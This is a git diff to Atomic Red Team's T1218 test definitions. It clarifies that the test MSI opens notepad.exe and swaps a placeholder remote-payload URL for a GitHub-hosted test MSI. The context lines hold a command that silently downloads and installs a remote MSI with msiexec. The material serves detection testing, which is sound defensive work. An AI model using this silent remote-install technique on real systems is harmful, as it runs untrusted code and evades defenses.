diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index d02a270f..ddaac82b 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -161,7 +161,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Msiexec.exe - Execute Local MSI file
-Execute arbitrary MSI file. Commonly seen in application installation.
+Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed.
**Supported Platforms:** Windows
@@ -202,7 +202,7 @@ Write-Host "You must provide your own MSI"
## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file
-Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
+Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed.
**Supported Platforms:** Windows
@@ -212,7 +212,7 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| msi_payload | MSI file to execute | String | http://site.com/file.msi|
+| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi|
#### Attack Commands: Run with `command_prompt`!
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 49d752bb..596fb2e0 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -12089,6 +12089,7 @@ defense-evasion:
'
- name: Msiexec.exe - Execute Local MSI file
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+ The MSI opens notepad.exe when sucessfully executed.
'
supported_platforms:
@@ -12110,7 +12111,8 @@ defense-evasion:
'
- name: Msiexec.exe - Execute Remote MSI file
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
- in application installation, commonly seen in malware execution.
+ in application installation, commonly seen in malware execution. The MSI opens
+ notepad.exe when sucessfully executed.
'
supported_platforms:
@@ -12119,7 +12121,7 @@ defense-evasion:
msi_payload:
description: MSI file to execute
type: String
- default: http://site.com/file.msi
+ default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi
executor:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"
@@ -24307,6 +24309,7 @@ execution:
'
- name: Msiexec.exe - Execute Local MSI file
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+ The MSI opens notepad.exe when sucessfully executed.
'
supported_platforms:
@@ -24328,7 +24331,8 @@ execution:
'
- name: Msiexec.exe - Execute Remote MSI file
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
- in application installation, commonly seen in malware execution.
+ in application installation, commonly seen in malware execution. The MSI opens
+ notepad.exe when sucessfully executed.
'
supported_platforms:
@@ -24337,7 +24341,7 @@ execution:
msi_payload:
description: MSI file to execute
type: String
- default: http://site.com/file.msi
+ default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi
executor:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"